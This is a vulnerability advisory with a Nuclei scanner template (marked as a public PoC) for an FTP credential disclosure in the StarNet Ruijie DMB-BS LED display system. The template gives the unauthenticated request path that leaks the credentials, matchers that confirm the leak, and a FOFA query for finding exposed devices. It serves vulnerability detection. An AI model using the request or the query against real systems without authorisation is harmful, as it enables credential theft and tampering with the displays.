The StarNet Ruijie DMB-BS LED Display System contains a security vulnerability in its taskexport interface that allows unauthorized access to FTP server credentials and connection parameters. This exposure enables potential attackers to gain unauthorized access to the FTP server, potentially compromising the integrity and content of the LED display system.
PoC代码[已公开]
id: starnet-dmb-bs-ftp-credentials-disclosure
info:
name: StarNet DMB-BS - FTP Credentials Disclosure
author: brucelsone
severity: medium
description: |
The StarNet Ruijie DMB-BS LED Display System contains a security vulnerability in its taskexport interface that allows unauthorized access to FTP server credentials and connection parameters. This exposure enables potential attackers to gain unauthorized access to the FTP server, potentially compromising the integrity and content of the LED display system.
reference:
- https://www.ddpoc.com/DVB-2024-7055.html
- https://blog.csdn.net/shelter1234567/article/details/145521914
metadata:
verified: true
max-request: 1
fofa-query: (app="STAR_NET-数字标牌系统" || -欢迎! -- BS3.2.02.38447- || icon_hash="-260118452")
tags: starnet,ruijie,ftp,password,exposures,vuln
http:
- method: GET
path:
- "{{RootURL}}/dmb/out/taskexport.jsp?taskcode"
matchers:
- type: dsl
dsl:
- "contains(content_type, 'text/xml')"
- "contains_all(body, 'user=','tasks version')"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100a88b9431b3a2a9cdf75fd438bca152e79dbd8e1a3bbaeb7389ad5a57ab3ffe73022100ee271f64de6e2b844dbd206bea0a9044b7d00b2e0a656e981177c1e5e803dc24:922c64590222798bb761d5b6d8e72950